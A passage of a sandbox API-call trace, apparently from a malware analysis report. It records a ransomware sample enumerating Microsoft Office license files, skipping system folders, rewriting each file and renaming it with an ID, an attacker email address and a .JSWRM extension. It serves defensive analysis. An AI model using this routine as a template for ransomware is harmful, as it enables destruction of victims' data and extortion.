(lpString1="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.794] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.794] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.794] lstrcmpiW (lpString1="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0107.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0107.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=44, lpMultiByteStr=0x22d0a0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 44 [0107.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0107.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0107.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0107.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", cchWideChar=44, lpMultiByteStr=0x22d0d8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 44 [0107.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0107.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0107.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0107.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0107.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.795] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11661) returned 1 [0107.795] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0107.795] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0107.797] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.797] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0107.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.797] CloseHandle (hObject=0x45c) returned 1 [0107.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0107.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0107.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0107.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0107.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0107.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0107.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.798] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0107.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0107.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0107.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.801] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9185850, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9185850, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9244408, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29a7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProMSDNR_Retail-pl.xrm-ms", cAlternateFileName="PR9591~1.XRM")) returned 1 [0107.801] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0107.801] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0107.801] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0107.801] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0107.801] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0107.801] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.801] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.801] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.801] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.801] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0107.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0107.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProMSDNR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0107.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0107.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProMSDNR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0107.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0107.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0107.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.802] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10663) returned 1 [0107.802] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0107.802] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0107.809] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.809] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0107.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.810] CloseHandle (hObject=0x45c) returned 1 [0107.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0107.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0107.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0107.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0107.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0107.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.810] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0107.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0107.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.811] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe94a6a18, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe94a6a18, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe95655e2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51b7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProMSDNR_Retail-ppd.xrm-ms", cAlternateFileName="PR35EC~1.XRM")) returned 1 [0107.811] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0107.811] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0107.811] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0107.811] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0107.811] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.811] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.811] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.811] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.811] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.811] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProMSDNR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0107.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProMSDNR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0107.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0107.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0107.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.812] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20919) returned 1 [0107.813] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0107.813] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0107.815] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.815] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0107.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.816] CloseHandle (hObject=0x45c) returned 1 [0107.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0107.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0107.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0107.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0107.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0107.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0107.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.816] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0107.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0107.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0107.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.817] FindNextFileW (in: hFindFile=0x231d40, 